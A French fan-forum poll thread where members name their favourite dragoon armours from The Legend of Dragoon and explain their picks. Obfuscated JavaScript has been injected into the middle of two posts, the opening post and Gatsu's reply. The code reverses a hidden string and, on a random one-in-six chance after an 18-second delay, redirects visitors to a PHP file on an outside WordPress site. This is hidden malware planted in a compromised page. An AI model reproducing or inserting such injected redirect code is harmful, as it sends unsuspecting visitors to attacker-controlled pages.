Vos dragoons préférés

Pour parler du jeu
Répondre

Quels sont vos âmes de dragoons préférées?

Dragon aux Yeux Rouges
2
8%
Dragon de Jade
2
8%
Dragon d'Argent Blanc
4
17%
Dragon Noir
3
13%
Dragon d'Or
1
4%
Dragon Violet
5
21%
Dragon de Mer Bleu
4
17%
Dragon Divin
3
13%
 
Nombre total de votes : 24
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Vos dragoons préférés

Message par Septine Madrona »

Quels sont vos dragoons préférés? Plusieurs choix possibles.
Merci d'expliquer votre choix qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and vous votez.

Pour ma part, j'ai une préférence pour le Dragon Noir, le Dragon d'Argent Blanc, le Dragon Violet et le Dragon de Mer Bleu. J'aime bien leurs pouvoirs, je les trouve efficaces et visuellement sympas.
Le super marteau de Meru en jette! :)
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Vos dragoons préférés

Message par yami627 »

le dragoon rouge, noir, blanc et bleu sont mes préférés. D'abord pour leurs costumes qui sont les plus réussi ^^ ensuite pour l'efficacité de leurs attaque et de leurs soins ^^
Image
Avatar du membre
deftoto
Jeune Dragon
Jeune Dragon
Messages : 6
Enregistré le : 27 avr. 2011, 16:16

Re: Vos dragoons préférés

Message par deftoto »

Moi c le violet et oui je reste fidéle a Haschel
Il est tout simplement sublime avec son dragoon
Et en plus ces attaques sont puissantes et inflige de graves dommages
Tout simplemnt magnifique
:ugeek: :ugeek:
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Vos dragoons préférés

Message par Lloyd »

Le Dragon noir est très classe mais j'aime bien aussi l'armure de dragoon d'Hashel aussi car elle n'a pas d'épaulettes ca change et c'est stylé :mrgreen:
Image
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Vos dragoons préférés

Message par Gatsu »

Moi le dragoon divin , qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and dart à l'armure il est tout simplement monstrueux ! :D :lol:
Avatar du membre
kiki15
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 16
Enregistré le : 08 mai 2011, 15:02
Localisation : Bretagne

Re: Vos dragoons préférés

Message par kiki15 »

J'aime l'armure du Dragon divin car la plus puissante (en théorie), l'armure du dragon de Jade car les attaques d'air je trouve ça sympa (une tornade s'est puissant, non!), ensuite l'armure du dragon violet pour la couleur et les attaques de foudre (j'aime voir les sillons des éclairs dans le ciel quand il fait orage) et enfin l'armure du dragon de mer car c'est pour moi la plus belle des armures féminine (elle me fait beaucoup penser à l'invocation Shiva que j'adore dans les Final Fantasy).
Avatar du membre
-Su-
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 33
Enregistré le : 24 mai 2013, 18:06

Re: Vos dragoons préférés

Message par -Su- »

J'ai donné mon vote à l'âme du dragon d'argent. Tout simplement car elle sort un peu du lot de part son pouvoir de guérison. La plupart des autres âmes n'ont que des pouvoirs agressifs, sauf celle de Méru qui peut soigner un peu et celle d'Albert qui peut protéger. Celle du dragon d'argent nous rappelle que les dragoons ne sont pas que des guerriers apportant la mort, mais ont aussi pour rôle de préserver la vie. Drake, un de mes personnages secondaires préférés, est ainsi sauvé par cette âme, tout comme Kamui, dont la sauvagerie est soignée grâce à Shana.

Enfin, la transformation en dragoon de Shana et de Miranda est vraiment jolie et pleine de grâce. ( Troll : Et même que Dart il en a rien à faire que Shana se foute à poils devant Lavitz son meilleur pote et Haschel son grand-père ! )
"Oeil de l'âme, éveille-toi !"
Répondre